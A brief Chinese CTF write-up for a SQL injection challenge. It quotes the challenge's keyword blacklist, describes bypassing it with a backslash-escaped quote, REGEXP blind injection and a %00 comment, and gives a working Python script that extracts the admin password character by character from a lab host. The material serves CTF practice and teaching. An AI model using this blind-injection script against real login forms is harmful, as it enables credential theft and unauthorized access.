SQLi

robots.txt提示存在hint.txt含有提示......

$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i";


If $_POST['passwd'] === admin's password,

Then you will get the flag;

太绕了，我选择直接看wp，利用\转义'，passwd变成查询语句，regrexp注入，%00换行注释

import string
import requests
import time
from urllib import parse

url = 'http://b5774215-3cf9-41cb-b58d-afca88641fdd.node4.buuoj.cn:81/'
result = ''
# 26个字母+数字+一些符号，小心通配符
s = string.ascii_lowercase + string.digits + '_{}'
last = 'tmp'
while(result != last):
    last = result
    for i in s:
        payload = "||(passwd)regexp(\"^{}\");{}".format(
            (result+i), parse.unquote('%00'))
        data = {
            "username": "\\",
            "passwd": payload
        }
        res = requests.post(url, data=data)
        if res.status_code == 503:
            print('Too fast')
            break
        if b'welcome' in res.content:
            result += i
            print(result)
            break
        time.sleep(0.05)
print('[*]'+result)

https://syunaht.com/p/2489403193.html